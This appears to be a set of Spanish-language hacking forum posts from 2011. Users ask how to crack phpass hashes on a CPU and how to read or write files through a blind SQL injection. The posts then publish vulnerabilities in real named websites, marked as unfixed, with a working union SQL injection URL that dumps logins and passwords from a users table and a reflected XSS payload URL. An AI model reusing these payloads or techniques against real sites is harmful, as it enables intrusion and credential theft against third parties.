Mensajes

Hay alguna forma de crackear un hash phpass sin hashcat ya que necesito una placa nvidia con CUDA o una AMD bastante grosa.Se puede brutear con el CPU?   

http://www.telefonica.net/web2/telamarinera/docus/blind_sql.pdf

apartado 0x8 

Excelente

Encontre una blind sql y al poner estos parametros "and (select 1 from mysql.user limit 0,1)=1" la pagina carga normalmente,y segun lo que lei(Primera blind sqli) quiere decir que tengo ciertos "Privilegios" y puedo usar Load_file y OUTFILE aunque no logre un Full Path Disclosure.Como aplico los paremetros de OUTFILE o load_file en una blind sql?

Sitio web: http://www.elpais.cr
Descubridor: franco_tuv
Fecha de descubrimiento: 22 de Julio del 2011
Fecha de notificación: 22 de Julio del 2011
Fecha de publicación: 23 de Julio del 2011
Arreglado : No
Información adicional:

Código [Seleccionar] Expandir

SQLI
http://www.elpais.cr/galerias.php?id=-1+union+select+1,group_concat%28login,0x3a,password%29+from+406060_elpais.usuarios--

Sitio web: http://www.tvpublica.com.ar
Descubridor: franco_tuv
Fecha de descubrimiento: 20 de Julio del 2011
Fecha de notificación: 20 de Julio del 2011
Fecha de publicación: 23 de Julio del 2011
Arreglado : No
Información adicional:

Código [Seleccionar] Expandir

http://www.tvpublica.com.ar/tvpublica/busqueda?searchText=%3Cscript%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/script%3E&page=1